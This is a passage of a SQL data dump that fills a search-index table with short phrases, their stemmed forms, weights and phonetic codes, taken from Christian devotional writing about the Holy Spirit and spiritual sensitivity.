(325427, 'this will heighten', 'thi will heighten', 0, 1, 1.6, 'T24235', 1, '*'),
(325428, 'though it', 'though it', 0, 1, 1.3, 'T230', 1, '*'),
(325429, 'though it doesn\'t', 'though it doesn', 0, 1, 1.5667, 'T23253', 1, '*'),
(325430, 'through your sensitivity', 'through your sensitivity', 0, 1, 1.8, 'T626252313', 1, '*'),
(325431, 'through your struggle', 'through your struggle', 0, 1, 1.7, 'T62623624', 1, '*'),
(325432, 'to a great', 'to a great', 0, 1, 1.3333, 'T263', 1, '*'),
(325433, 'to a message', 'to a message', 0, 1, 1.4, 'T520', 1, '*'),
(325434, 'to baptise', 'to baptise', 0, 1, 1.3333, 'T132', 1, '*'),
(325435, 'to baptise you', 'to baptise you', 0, 1, 1.4667, 'T132', 1, '*'),
(325436, 'to be sharpened', 'to be sharpened', 0, 1, 1.5, 'T126153', 1, '*'),
(325437, 'to break into', 'to break into', 0, 1, 1.4333, 'T16253', 1, '*'),
(325438, 'to cross', 'to cross', 0, 1, 1.2667, 'T262', 1, '*'),
(325439, 'to cross from', 'to cross from', 0, 1, 1.4333, 'T262165', 1, '*'),
(325440, 'to do away', 'to do away', 0, 1, 1.3333, 'T000', 1, '*'),
(325441, 'to enhancing', 'to enhancing', 0, 1, 1.4, 'T5252', 1, '*'),
(325442, 'to enhancing your', 'to enhancing your', 0, 1, 1.5667, 'T52526', 1, '*'),
(325443, 'to flow in', 'to flow in', 0, 1, 1.3333, 'T145', 1, '*'),
(325444, 'to lying', 'to lying', 0, 1, 1.2667, 'T452', 1, '*'),
(325445, 'to lying spirit', 'to lying spirit', 0, 1, 1.5, 'T452163', 1, '*'),
(325446, 'to man', 'to man', 0, 1, 1.2, 'T500', 1, '*'),
(325447, 'to negative', 'to negative', 0, 1, 1.3667, 'T5231', 1, '*'),
(325448, 'to negative passion', 'to negative passion', 0, 1, 1.6333, 'T523125', 1, '*'),
(325449, 'to play or', 'to play or', 0, 1, 1.3333, 'T146', 1, '*'),
(325450, 'to positive', 'to positive', 0, 1, 1.3667, 'T1231', 1, '*'),
(325451, 'to positive passions', 'to positive passions', 0, 1, 1.6667, 'T1231252', 1, '*'),
(325452, 'to survive if', 'to survive if', 0, 1, 1.4333, 'T261', 1, '*'),
(325453, 'to that place', 'to that place', 0, 1, 1.4333, 'T142', 1, '*'),
(325454, 'to work in', 'to work in', 0, 1, 1.3333, 'T625', 1, '*'),
(325455, 'to yield to', 'to yield to', 0, 1, 1.3667, 'T430', 1, '*'),
(325456, 'today and tomorrow', 'todai and tomorrow', 0, 1, 1.6, 'T5356', 2, '*'),
(325457, 'tomorrow', 'tomorrow', 0, 0, 0.5333, 'T560', 2, '*'),
(325458, 'tomorrow why', 'tomorrow why', 0, 1, 1.4, 'T560', 1, '*'),
(325459, 'tomorrow why don\'t', 'tomorrow why don', 0, 1, 1.6, 'T56353', 1, '*'),
(325460, 'tv', 'tv', 0, 0, 0.1333, 'T100', 1, '*'),
(325461, 'tv practiceputting', 'tv practiceputting', 0, 1, 1.6, 'T162321352', 1, '*'),
(325462, 'tv practiceputting worship', 'tv practiceputting worship', 0, 1, 1.8667, 'T162321352621', 1, '*'),
(325463, 'two are', 'two are', 0, 1, 1.2333, 'T600', 1, '*'),
(325464, 'two are dangerous', 'two are dangerous', 0, 1, 1.5667, 'T635262', 1, '*'),
(325465, 'unanointed', 'unanoint', 0, 0, 0.6667, 'U530', 1, '*'),
(325466, 'unanointed atmosphere', 'unanoint atmosphere', 0, 1, 1.7, 'U535216', 1, '*'),
(325467, 'unanointed atmosphere it', 'unanoint atmosphere it', 0, 1, 1.8, 'U5352163', 1, '*'),
(325468, 'ungodly', 'ungodli', 0, 0, 0.4667, 'U5234', 1, '*'),
(325469, 'ungodly and', 'ungodli and', 0, 1, 1.3667, 'U523453', 1, '*'),
(325470, 'ungodly and unholy', 'ungodli and unholy', 0, 1, 1.6, 'U52345354', 1, '*'),
(325471, 'unholy', 'unholi', 0, 0, 0.4, 'U540', 1, '*'),
(325472, 'unholy alliances', 'unholi alliances', 0, 1, 1.5333, 'U5452', 1, '*'),
(325473, 'unholy alliances 10', 'unholi alliances 10', 0, 1, 1.6333, 'U5452', 1, '*'),
(325474, 'ways to break', 'wai to break', 0, 1, 1.4333, 'W23162', 1, '*'),
(325475, 'weaken', 'weaken', 0, 0, 0.4, 'W250', 1, '*'),
(325476, 'weaken your', 'weaken your', 0, 1, 1.3667, 'W256', 1, '*'),
(325477, 'weaken your sensitivity', 'weaken your sensitivity', 0, 1, 1.7667, 'W256252313', 1, '*'),
(325478, 'what makes you', 'what makes you', 0, 1, 1.4667, 'W352', 1, '*'),
(325479, 'what you speak', 'what you speak', 0, 1, 1.4667, 'W3212', 1, '*'),
(325480, 'when the person', 'when the person', 0, 1, 1.5, 'W531625', 1, '*'),
(325481, 'whether good', 'whether good', 0, 1, 1.4, 'W3623', 1, '*'),
(325482, 'whether good or', 'whether good or', 0, 1, 1.5, 'W36236', 1, '*'),
(325483, 'will embarrass', 'will embarrass', 0, 1, 1.4667, 'W45162', 1, '*'),
(325484, 'will embarrass you', 'will embarrass you', 0, 1, 1.6, 'W45162', 1, '*'),
(325485, 'will guarantee', 'will guarantee', 0, 1, 1.4667, 'W42653', 1, '*'),
(325486, 'will guarantee you', 'will guarantee you', 0, 1, 1.6, 'W42653', 1, '*'),
(325487, 'will heighten', 'will heighten', 0, 1, 1.4333, 'W4235', 1, '*'),
(325488, 'will heighten your', 'will heighten your', 0, 1, 1.6, 'W42356', 1, '*'),
(325489, 'will not last', 'will not last', 0, 1, 1.4333, 'W453423', 1, '*'),
(325490, 'will weaken', 'will weaken', 0, 1, 1.3667, 'W425', 1, '*'),
(325491, 'will weaken your', 'will weaken your', 0, 1, 1.5333, 'W4256', 1, '*'),
(325492, 'winds', 'wind', 0, 0, 0.3333, 'W532', 1, '*'),
(325493, 'winds and', 'wind and', 0, 1, 1.3, 'W53253', 1, '*'),
(325494, 'winds and the', 'wind and the', 0, 1, 1.4333, 'W53253', 1, '*'),
(325495, 'with a high', 'with a high', 0, 1, 1.3667, 'W320', 1, '*'),
(325496, 'with character', 'with character', 0, 1, 1.4667, 'W326236', 1, '*'),
(325497, 'with character than', 'with character than', 0, 1, 1.6333, 'W32623635', 1, '*'),
(325498, 'with dead', 'with dead', 0, 1, 1.3, 'W300', 1, '*'),
(325499, 'with dead spirits', 'with dead spirits', 0, 1, 1.5667, 'W321632', 1, '*'),
(325500, 'with gifts', 'with gifts', 0, 1, 1.3333, 'W32132', 1, '*'),
(325501, 'with gifts and', 'with gifts and', 0, 1, 1.4667, 'W3213253', 1, '*'),
(325502, 'with meals', 'with meals', 0, 1, 1.3333, 'W3542', 1, '*'),
(325503, 'with meals sometimes', 'with meals sometimes', 0, 1, 1.6667, 'W35425352', 1, '*'),
(325504, 'with no character', 'with no character', 0, 1, 1.5667, 'W3526236', 1, '*'),
(325505, 'with your greatness', 'with your greatness', 0, 1, 1.6333, 'W3626352', 1, '*'),
(325506, 'wonder', 'wonder', 0, 0, 0.4, 'W536', 1, '*'),
(325507, 'wonder at', 'wonder at', 0, 1, 1.3, 'W5363', 1, '*'),
(325508, 'wonder at a', 'wonder at a', 0, 1, 1.3667, 'W5363', 1, '*'),
(325509, 'work in your', 'work in your', 0, 1, 1.4, 'W6256', 1, '*'),
(325510, 'working in', 'work in', 0, 1, 1.3333, 'W62525', 1, '*'),
(325511, 'working in a', 'work in a', 0, 1, 1.4, 'W62525', 1, '*'),
(325512, 'world that', 'world that', 0, 1, 1.3333, 'W643', 1, '*'),
(325513, 'world that all', 'world that all', 0, 1, 1.4667, 'W6434', 1, '*'),
(325514, 'worship songs', 'worship songs', 0, 1, 1.4333, 'W621252', 1, '*'),
(325515, 'worship songs to', 'worship songs to', 0, 1, 1.5333, 'W6212523', 1, '*'),
(325516, 'wrong association', 'wrong association', 0, 1, 1.5667, 'W65235', 1, '*'),
(325517, 'wrong association ungodly', 'wrong association ungodly', 0, 1, 1.8333, 'W65235234', 1, '*'),
(325518, 'years of', 'year of', 0, 1, 1.2667, 'Y621', 1, '*'),
(325519, 'years of abundance', 'year of abundance', 0, 1, 1.6, 'Y6215352', 1, '*'),
(325520, 'yesterday', 'yesterdai', 0, 0, 0.6, 'Y2363', 2, '*'),
(325521, 'yesterday today', 'yesterdai today', 0, 1, 1.5, 'Y2363', 2, '*'),
(325522, 'yesterday today and', 'yesterdai today and', 0, 1, 1.6333, 'Y236353', 2, '*'),
(325523, 'yield to negative', 'yield to negative', 0, 1, 1.5667, 'Y435231', 1, '*'),
(325524, 'yield to positive', 'yield to positive', 0, 1, 1.5667, 'Y431231', 1, '*'),
(325525, 'you 10', 'you 10', 0, 1, 1.2, 'Y000', 1, '*'),
(325526, 'you 10 years', 'you 10 years', 0, 1, 1.4, 'Y620', 1, '*'),
(325527, 'you but', 'you but', 0, 1, 1.2333, 'Y130', 1, '*'),
(325528, 'you but you', 'you but you', 0, 1, 1.3667, 'Y130', 1, '*'),
(325529, 'you can\'t be', 'you can be', 0, 1, 1.4, 'Y2531', 1, '*'),
(325530, 'you fall', 'you fall', 0, 1, 1.2667, 'Y140', 1, '*'),
(325531, 'you fall asleep', 'you fall asleep', 0, 1, 1.5, 'Y14241', 1, '*'),
(325532, 'you he can', 'you he can', 0, 1, 1.3333, 'Y250', 1, '*'),
(325533, 'you let him', 'you let him', 0, 1, 1.3667, 'Y435', 1, '*'),
(325534, 'you may need', 'you may need', 0, 1, 1.4, 'Y530', 2, '*'),
(325535, 'you need a', 'you need a', 0, 1, 1.3333, 'Y530', 1, '*'),
(325536, 'you need high', 'you need high', 0, 1, 1.4333, 'Y532', 1, '*'),
(325537, 'you need sensitivity', 'you need sensitivity', 0, 1, 1.6667, 'Y53252313', 1, '*'),
(325538, 'you somewhere', 'you somewhere', 0, 1, 1.4333, 'Y256', 1, '*'),
(325539, 'you somewhere giving', 'you somewhere giving', 0, 1, 1.6667, 'Y2562152', 1, '*'),
(325540, 'you speak in', 'you speak in', 0, 1, 1.4, 'Y2125', 1, '*'),
(325541, 'you to cross', 'you to cross', 0, 1, 1.4, 'Y3262', 1, '*'),
(325542, 'you to flow', 'you to flow', 0, 1, 1.3667, 'Y314', 1, '*'),
(325543, 'you what to', 'you what to', 0, 1, 1.3667, 'Y300', 1, '*'),
(325544, 'you with a', 'you with a', 0, 1, 1.3333, 'Y300', 1, '*'),
(325545, 'your awareness', 'your awareness', 0, 1, 1.4667, 'Y652', 1, '*'),
(325546, 'your awareness of', 'your awareness of', 0, 1, 1.5667, 'Y6521', 1, '*'),
(325547, 'your greatness', 'your greatness', 0, 1, 1.4667, 'Y626352', 1, '*'),
(325548, 'your greatness will', 'your greatness will', 0, 1, 1.6333, 'Y6263524', 1, '*'),
(325549, 'your sensitivity it\'s', 'your sensitivity it', 0, 1, 1.7, 'Y62523132', 1, '*'),
(325550, 'your sensitivity till', 'your sensitivity till', 0, 1, 1.7, 'Y62523134', 1, '*'),
(325551, 'your sensitivity to', 'your sensitivity to', 0, 1, 1.6333, 'Y6252313', 1, '*'),
(325552, 'your signals', 'your signals', 0, 1, 1.4, 'Y62542', 1, '*'),
(325553, 'your signals disobedience', 'your signals disobedience', 0, 1, 1.8333, 'Y62542321352', 1, '*'),
(325554, 'your spirit avoid', 'your spirit avoid', 0, 1, 1.5667, 'Y6216313', 1, '*'),
(325555, 'your struggle', 'your struggle', 0, 1, 1.4333, 'Y623624', 1, '*'),
(325556, 'your struggle but', 'your struggle but', 0, 1, 1.5667, 'Y62362413', 1, '*'),
(325557, 'yourself that', 'yourself that', 0, 1, 1.4333, 'Y62413', 1, '*'),
(325558, 'yourself that god', 'yourself that god', 0, 1, 1.5667, 'Y6241323', 1, '*'),
(325809, '.” i', '.” i', 0, 1, 1.1333, '”000', 1, '*'),
(325810, '.” i wrote', '.” i wrote', 0, 1, 1.3333, '”630', 1, '*'),
(325811, '02 08', '02 08', 0, 1, 1.1667, '', 1, '*'),
(325812, '02 08 2018', '02 08 2018', 0, 1, 1.3333, '', 1, '*'),
(325813, '1 don\'t', '1 don', 0, 1, 1.2333, 'D530', 1, '*'),
(325814, '1 don\'t ignore', '1 don ignore', 0, 1, 1.4667, 'D53256', 1, '*'),
(325815, '1 sam', '1 sam', 0, 1, 1.1667, 'S500', 1, '*'),
(325816, '1 sam 15', '1 sam 15', 0, 1, 1.2667, 'S500', 1, '*'),
(325817, '10 do', '10 do', 0, 1, 1.1667, 'D000', 1, '*'),
(325818, '10 do not', '10 do not', 0, 1, 1.3, 'D530', 1, '*'),
(325819, '10-23', '10-23', 0, 0, 0.5, '', 1, '*'),
(325820, '10-23 do', '10-23 do', 0, 1, 1.2667, 'D000', 1, '*'),
(325821, '10-23 do not', '10-23 do not', 0, 1, 1.4, 'D530', 1, '*'),
(325822, '15 10-23', '15 10-23', 0, 1, 1.2667, '', 1, '*'),
(325823, '15 10-23 do', '15 10-23 do', 0, 1, 1.3667, 'D000', 1, '*'),
(325824, '19 08', '19 08', 0, 1, 1.1667, '', 1, '*'),
(325825, '19 08 2018', '19 08 2018', 0, 1, 1.3333, '', 1, '*'),
(325826, '2 don\'t', '2 don', 0, 1, 1.2333, 'D530', 1, '*'),
(325827, '2 don\'t grieve', '2 don grieve', 0, 1, 1.4667, 'D53261', 1, '*'),
(325828, '3 don\'t', '3 don', 0, 1, 1.2333, 'D530', 1, '*'),
(325829, '3 don\'t take', '3 don take', 0, 1, 1.4, 'D532', 1, '*'),
(325830, '3 says', '3 says', 0, 1, 1.2, 'S000', 1, '*'),
(325831, '3 says “and', '3 says “and', 0, 1, 1.3667, 'S530', 1, '*'),
(325832, '30 says', '30 says', 0, 1, 1.2333, 'S000', 1, '*'),
(325833, '30 says and', '30 says and', 0, 1, 1.3667, 'S530', 1, '*'),
(325834, '4 30', '4 30', 0, 1, 1.1333, '', 1, '*'),
(325835, '4 30 says', '4 30 says', 0, 1, 1.3, 'S000', 1, '*'),
(325836, '4 do', '4 do', 0, 1, 1.1333, 'D000', 1, '*'),
(325837, '4 do not', '4 do not', 0, 1, 1.2667, 'D530', 1, '*'),
(325838, '5 do', '5 do', 0, 1, 1.1333, 'D000', 1, '*'),
(325839, '5 do not', '5 do not', 0, 1, 1.2667, 'D530', 1, '*'),
(325840, '6 3', '6 3', 0, 1, 1.1, '', 1, '*'),
(325841, '6 3 says', '6 3 says', 0, 1, 1.2667, 'S000', 1, '*'),
(325842, '6 don\'t treat', '6 don treat', 0, 1, 1.4333, 'D5363', 1, '*'),
(325843, '60 from', '60 from', 0, 1, 1.2333, 'F650', 1, '*'),
(325844, '60 from our', '60 from our', 0, 1, 1.3667, 'F656', 1, '*'),
(325845, '7 do', '7 do', 0, 1, 1.1333, 'D000', 1, '*'),
(325846, '7 do not', '7 do not', 0, 1, 1.2667, 'D530', 1, '*'),
(325847, '8 don\'t take', '8 don take', 0, 1, 1.4, 'D532', 1, '*'),
(325848, 'a book', 'a book', 0, 1, 1.2, 'A120', 1, '*'),
(325849, 'a book lose', 'a book lose', 0, 1, 1.3667, 'A1242', 1, '*'),
(325850, 'a born-again', 'a born-again', 0, 1, 1.4, 'A16525', 1, '*'),
(325851, 'a born-again recreated', 'a born-again recreated', 0, 1, 1.7333, 'A165256263', 1, '*'),
(325852, 'a customized', 'a customized', 0, 1, 1.4, 'A23523', 1, '*'),
(325853, 'a customized operation', 'a customized operation', 0, 1, 1.7333, 'A235231635', 1, '*'),
(325854, 'a decision many', 'a decision many', 0, 1, 1.5, 'A325', 1, '*'),
(325855, 'a divine instruction', 'a divine instruction', 0, 1, 1.6667, 'A315236235', 1, '*'),
(325856, 'a few', 'a few', 0, 1, 1.1667, 'A100', 1, '*'),
(325857, 'a few are', 'a few are', 0, 1, 1.3, 'A160', 1, '*'),
(325858, 'a future of', 'a future of', 0, 1, 1.3667, 'A1361', 1, '*'),
(325859, 'a leader fails', 'a leader fails', 0, 1, 1.4667, 'A436142', 1, '*'),
(325860, 'a man continually', 'a man continually', 0, 1, 1.5667, 'A525354', 1, '*'),
(325861, 'a person calling', 'a person calling', 0, 1, 1.5333, 'A16252452', 1, '*'),
(325862, 'a plague', 'a plague', 0, 1, 1.2667, 'A142', 1, '*'),
(325863, 'a plague activities', 'a plague activities', 0, 1, 1.6333, 'A1423132', 1, '*'),
(325864, 'a right', 'a right', 0, 1, 1.2333, 'A623', 1, '*'),
(325865, 'a right to', 'a right to', 0, 1, 1.3333, 'A623', 1, '*'),
(325866, 'a spare-tyre', 'a spare-tyre', 0, 1, 1.4, 'A21636', 1, '*'),
(325867, 'a spare-tyre don\'t', 'a spare-tyre don', 0, 1, 1.6, 'A21636353', 1, '*'),
(325868, 'a strong inner', 'a strong inner', 0, 1, 1.4667, 'A2365256', 1, '*'),
(325869, 'a sugar-daddy', 'a sugar-daddy', 0, 1, 1.4333, 'A263', 1, '*'),
(325870, 'a sugar-daddy kind', 'a sugar-daddy kind', 0, 1, 1.6, 'A263253', 1, '*'),
(325871, 'a thing or', 'a thing or', 0, 1, 1.3333, 'A3526', 1, '*'),
(325872, 'above becomes', 'abov becomes', 0, 1, 1.4333, 'A1252', 1, '*'),
(325873, 'above becomes your', 'abov becomes your', 0, 1, 1.6, 'A12526', 1, '*'),
(325874, 'abundantly above becomes', 'abundantli above becomes', 0, 1, 1.8, 'A1535341252', 1, '*'),
(325875, 'action constraint', 'action constraint', 0, 1, 1.5667, 'A2352523653', 1, '*'),
(325876, 'action constraint is', 'action constraint is', 0, 1, 1.6667, 'A23525236532', 1, '*'),
(325877, 'activities that grieve', 'activ that grieve', 0, 1, 1.7333, 'A231323261', 1, '*'),
(325878, 'activities that make', 'activ that make', 0, 1, 1.6667, 'A23132352', 1, '*'),
(325879, 'affairs of', 'affair of', 0, 1, 1.3333, 'A1621', 1, '*'),
(325880, 'affairs of your', 'affair of your', 0, 1, 1.5, 'A16216', 1, '*'),
(325881, 'ago that i', 'ago that i', 0, 1, 1.3333, 'A230', 1, '*'),
(325882, 'ahead do', 'ahead do', 0, 1, 1.2667, 'A300', 1, '*'),
(325883, 'ahead do not', 'ahead do not', 0, 1, 1.4, 'A353', 1, '*'),
(325884, 'ahead some', 'ahead some', 0, 1, 1.3333, 'A325', 1, '*'),
(325885, 'ahead some versions', 'ahead some versions', 0, 1, 1.6333, 'A32516252', 1, '*'),
(325886, 'all the other', 'all the other', 0, 1, 1.4333, 'A436', 1, '*'),
(325887, 'all the resources', 'all the resources', 0, 1, 1.5667, 'A436262', 1, '*'),
(325888, 'allow jesus', 'allow jesus', 0, 1, 1.3667, 'A420', 1, '*'),
(325889, 'allow jesus to', 'allow jesus to', 0, 1, 1.4667, 'A423', 1, '*'),
(325890, 'allow the holy', 'allow the holy', 0, 1, 1.4667, 'A434', 1, '*'),
(325891, 'also come', 'also come', 0, 1, 1.3, 'A425', 1, '*'),
(325892, 'also come to', 'also come to', 0, 1, 1.4, 'A4253', 1, '*'),
(325893, 'also do', 'also do', 0, 1, 1.2333, 'A423', 1, '*'),
(325894, 'also do the', 'also do the', 0, 1, 1.3667, 'A423', 1, '*'),
(325895, 'always allow', 'alwai allow', 0, 1, 1.4, 'A424', 1, '*'),
(325896, 'always allow jesus', 'alwai allow jesus', 0, 1, 1.6, 'A4242', 1, '*'),
(325897, 'always strive', 'alwai strive', 0, 1, 1.4333, 'A42361', 1, '*'),
(325898, 'always strive with', 'alwai strive with', 0, 1, 1.6, 'A423613', 1, '*'),
(325899, 'an equally', 'an equally', 0, 1, 1.3333, 'A524', 1, '*'),
(325900, 'an equally strong', 'an equally strong', 0, 1, 1.5667, 'A52423652', 1, '*'),
(325901, 'an influence', 'an influence', 0, 1, 1.4, 'A51452', 1, '*'),
(325902, 'an influence he', 'an influence he', 0, 1, 1.5, 'A51452', 1, '*'),
(325903, 'an influence is', 'an influence is', 0, 1, 1.5, 'A51452', 1, '*'),
(325904, 'an influence the', 'an influence the', 0, 1, 1.5333, 'A514523', 1, '*'),
(325905, 'and be guiltless', 'and be guiltless', 0, 1, 1.5333, 'A53124342', 1, '*'),
(325906, 'and eventually you', 'and eventually you', 0, 1, 1.6, 'A531534', 1, '*'),
(325907, 'and grieve', 'and grieve', 0, 1, 1.3333, 'A53261', 1, '*'),
(325908, 'and grieve not', 'and grieve not', 0, 1, 1.4667, 'A5326153', 1, '*'),
(325909, 'and it didn\'t', 'and it didn', 0, 1, 1.4333, 'A5353', 1, '*'),
(325910, 'and once', 'and once', 0, 1, 1.2667, 'A5352', 2, '*'),
(325911, 'and once the', 'and once the', 0, 1, 1.4, 'A53523', 1, '*'),
(325912, 'and renewed', 'and renewed', 0, 1, 1.3667, 'A53653', 1, '*'),
(325913, 'and renewed person', 'and renewed person', 0, 1, 1.6, 'A536531625', 1, '*'),
(325914, 'and restraint', 'and restraint', 0, 1, 1.4333, 'A53623653', 1, '*'),
(325915, 'and restraint ignoring', 'and restraint ignoring', 0, 1, 1.7333, 'A5362365325652', 1, '*'),
(325916, 'anger disobedience', 'anger disobedience', 0, 1, 1.6, 'A526321352', 1, '*'),
(325917, 'anger disobedience to', 'anger disobedience to', 0, 1, 1.7, 'A5263213523', 1, '*'),
(325918, 'anointed and', 'anoint and', 0, 1, 1.4, 'A5353', 1, '*'),
(325919, 'anointed and be', 'anoint and be', 0, 1, 1.5, 'A53531', 1, '*'),
(325920, 'anointing be', 'anoint be', 0, 1, 1.4, 'A53521', 1, '*'),
(325921, 'anointing be careful', 'anoint be careful', 0, 1, 1.6667, 'A535212614', 1, '*'),
(325922, 'any longer', 'ani longer', 0, 1, 1.3333, 'A54526', 1, '*'),
(325923, 'any longer you', 'ani longer you', 0, 1, 1.4667, 'A54526', 1, '*'),
(325924, 'anything you must', 'anyth you must', 0, 1, 1.5667, 'A5352523', 1, '*'),
(325925, 'are 8', 'ar 8', 0, 1, 1.1667, 'A600', 1, '*'),
(325926, 'are 8 don\'t', 'ar 8 don', 0, 1, 1.3667, 'A6353', 1, '*'),
(325927, 'are decisions', 'ar decisions', 0, 1, 1.4333, 'A63252', 1, '*'),
(325928, 'are decisions that', 'ar decisions that', 0, 1, 1.6, 'A632523', 1, '*'),
(325929, 'are individuals', 'ar individuals', 0, 1, 1.5, 'A6531342', 1, '*'),
(325930, 'are individuals that', 'ar individuals that', 0, 1, 1.6667, 'A65313423', 1, '*'),
(325931, 'are only refreshed', 'ar only refreshed', 0, 1, 1.6, 'A65461623', 1, '*'),
(325932, 'are sealed', 'ar sealed', 0, 1, 1.3333, 'A6243', 1, '*'),
(325933, 'are sealed unto', 'ar sealed unto', 0, 1, 1.5, 'A624353', 1, '*'),
(325934, 'as a born-again', 'as a born-again', 0, 1, 1.5, 'A216525', 1, '*'),
(325935, 'as compel', 'as compel', 0, 1, 1.3, 'A2514', 1, '*'),
(325936, 'as compel therefore', 'as compel therefore', 0, 1, 1.6333, 'A25143616', 1, '*'),
(325937, 'as you enter', 'as you enter', 0, 1, 1.4, 'A2536', 1, '*'),
(325938, 'attack if', 'attack if', 0, 1, 1.3, 'A321', 1, '*'),
(325939, 'attack if a', 'attack if a', 0, 1, 1.3667, 'A321', 1, '*'),
(325940, 'attack spiritual', 'attack spiritual', 0, 1, 1.5333, 'A321634', 1, '*'),
(325941, 'attack spiritual authorities', 'attack spiritual authorities', 0, 1, 1.9333, 'A3216343632', 1, '*'),
(325942, 'authorities david', 'author david', 0, 1, 1.5667, 'A3632313', 1, '*'),
(325943, 'authorities david said', 'author david said', 0, 1, 1.7333, 'A363231323', 1, '*'),
(325944, 'authorities it', 'author it', 0, 1, 1.4667, 'A36323', 1, '*'),
(325945, 'authorities it shall', 'author it shall', 0, 1, 1.6667, 'A3632324', 1, '*'),
(325946, 'avoid as', 'avoid as', 0, 1, 1.2667, 'A132', 1, '*'),
(325947, 'avoid as you', 'avoid as you', 0, 1, 1.4, 'A132', 1, '*'),
(325948, 'avoid like', 'avoid like', 0, 1, 1.3333, 'A1342', 1, '*'),
(325949, 'avoid like a', 'avoid like a', 0, 1, 1.4, 'A1342', 1, '*'),
(325950, 'away do', 'awai do', 0, 1, 1.2333, 'A300', 1, '*'),
(325951, 'away do not', 'awai do not', 0, 1, 1.3667, 'A353', 1, '*'),
(325952, 'back to their', 'back to their', 0, 1, 1.4333, 'B236', 1, '*'),
(325953, 'be a customized', 'be a customized', 0, 1, 1.5, 'B23523', 1, '*'),
(325954, 'be careful if', 'be careful if', 0, 1, 1.4333, 'B26141', 1, '*'),
(325955, 'be guiltless', 'be guiltless', 0, 1, 1.4, 'B24342', 1, '*'),
(325956, 'be guiltless when', 'be guiltless when', 0, 1, 1.5667, 'B243425', 1, '*'),
(325957, 'be lord', 'be lord', 0, 1, 1.2333, 'B463', 1, '*'),
(325958, 'be lord 9', 'be lord 9', 0, 1, 1.3, 'B463', 1, '*'),
(325959, 'be your first', 'be your first', 0, 1, 1.4333, 'B61623', 1, '*'),
(325960, 'becomes your normal', 'becom your normal', 0, 1, 1.6333, 'B25265654', 1, '*'),
(325961, 'belittle', 'belittl', 0, 0, 0.5333, 'B434', 1, '*'),
(325962, 'belittle him', 'belittl him', 0, 1, 1.4, 'B4345', 1, '*'),
(325963, 'belittle him by', 'belittl him by', 0, 1, 1.5, 'B43451', 1, '*'),
(325964, 'belittling', 'belittl', 0, 0, 0.6667, 'B43452', 1, '*'),
(325965, 'belittling his', 'belittl his', 0, 1, 1.4667, 'B43452', 1, '*'),
(325966, 'belittling his personality', 'belittl his personality', 0, 1, 1.8667, 'B43452162543', 1, '*'),
(325967, 'bible render', 'bibl render', 0, 1, 1.4, 'B46536', 1, '*'),
(325968, 'bible render constraint', 'bibl render constraint', 0, 1, 1.7667, 'B465362523653', 1, '*'),
(325969, 'bitterness', 'bitter', 0, 0, 0.6667, 'B3652', 1, '*'),
(325970, 'bitterness evil-speaking', 'bitter evil-speaking', 0, 1, 1.8, 'B36521421252', 1, '*'),
(325971, 'bitterness evil-speaking malice', 'bitter evil-speaking malice', 0, 1, 2, 'B36521421252542', 1, '*'),
(325972, 'book lose', 'book lose', 0, 1, 1.3, 'B242', 1, '*'),
(325973, 'book lose to', 'book lose to', 0, 1, 1.4, 'B2423', 1, '*'),
(325974, 'born-again recreated', 'born-again recreated', 0, 1, 1.6667, 'B65256263', 1, '*'),
(325975, 'born-again recreated and', 'born-again recreated and', 0, 1, 1.8, 'B6525626353', 1, '*'),
(325976, 'brings the', 'bring the', 0, 1, 1.3333, 'B6523', 1, '*'),
(325977, 'brings the signals', 'bring the signals', 0, 1, 1.6, 'B65232542', 1, '*'),
(325978, 'by calling', 'by calling', 0, 1, 1.3333, 'B2452', 1, '*'),
(325979, 'by calling him', 'by calling him', 0, 1, 1.4667, 'B24525', 1, '*'),
(325980, 'by force', 'by force', 0, 1, 1.2667, 'B620', 1, '*'),
(325981, 'by force or', 'by force or', 0, 1, 1.3667, 'B626', 1, '*'),
(325982, 'by strong', 'by strong', 0, 1, 1.3, 'B23652', 1, '*'),
(325983, 'by strong persuasion', 'by strong persuasion', 0, 1, 1.6667, 'B236521625', 1, '*'),
(325984, 'by which', 'by which', 0, 1, 1.2667, 'B200', 1, '*'),
(325985, 'by which the', 'by which the', 0, 1, 1.4, 'B230', 1, '*'),
(325986, 'call in', 'call in', 0, 1, 1.2333, 'C450', 1, '*'),
(325987, 'call in every', 'call in every', 0, 1, 1.4333, 'C4516', 1, '*'),
(325988, 'calling him', 'call him', 0, 1, 1.3667, 'C4525', 1, '*'),
(325989, 'calling him something', 'call him something', 0, 1, 1.7, 'C452525352', 1, '*'),
(325990, 'can also do', 'can also do', 0, 1, 1.3667, 'C5423', 1, '*'),
(325991, 'can stand the', 'can stand the', 0, 1, 1.4333, 'C52353', 1, '*'),
(325992, 'can\'t walk', 'can walk', 0, 1, 1.3333, 'C5342', 1, '*'),
(325993, 'can\'t walk with', 'can walk with', 0, 1, 1.5, 'C53423', 1, '*'),
(325994, 'careful if', 'care if', 0, 1, 1.3333, 'C6141', 1, '*'),
(325995, 'careful if you', 'care if you', 0, 1, 1.4667, 'C6141', 1, '*'),
(325996, 'come the', 'come the', 0, 1, 1.2667, 'C530', 1, '*'),
(325997, 'come the holy', 'come the holy', 0, 1, 1.4333, 'C534', 1, '*'),
(325998, 'come to him', 'come to him', 0, 1, 1.3667, 'C535', 1, '*'),
(325999, 'communication of', 'commun of', 0, 1, 1.5333, 'C52351', 1, '*'),
(326000, 'communication of the', 'commun of the', 0, 1, 1.6667, 'C523513', 1, '*'),
(326001, 'communications from', 'commun from', 0, 1, 1.6333, 'C52352165', 1, '*'),
(326002, 'communications from your', 'commun from your', 0, 1, 1.8, 'C523521656', 1, '*'),
(326003, 'compel', 'compel', 0, 0, 0.4, 'C514', 1, '*'),
(326004, 'compel therefore', 'compel therefore', 0, 1, 1.5333, 'C5143616', 1, '*'),
(326005, 'compel therefore it', 'compel therefore it', 0, 1, 1.6333, 'C51436163', 1, '*'),
(326006, 'compel you', 'compel you', 0, 1, 1.3333, 'C514', 1, '*'),
(326007, 'compel you to', 'compel you to', 0, 1, 1.4333, 'C5143', 1, '*'),
(326008, 'conscience can\'t', 'conscienc can', 0, 1, 1.5333, 'C525253', 1, '*'),
(326009, 'conscience can\'t walk', 'conscienc can walk', 0, 1, 1.7, 'C52525342', 1, '*'),
(326010, 'consequence', 'consequ', 0, 0, 0.7333, 'C5252', 1, '*'),
(326011, 'consequence of', 'consequ of', 0, 1, 1.4667, 'C52521', 1, '*'),
(326012, 'consequence of taking', 'consequ of taking', 0, 1, 1.7, 'C525213252', 1, '*'),
(326013, 'constrains', 'constrain', 0, 0, 0.6667, 'C523652', 1, '*'),
(326014, 'constrains you', 'constrain you', 0, 1, 1.4667, 'C523652', 1, '*'),
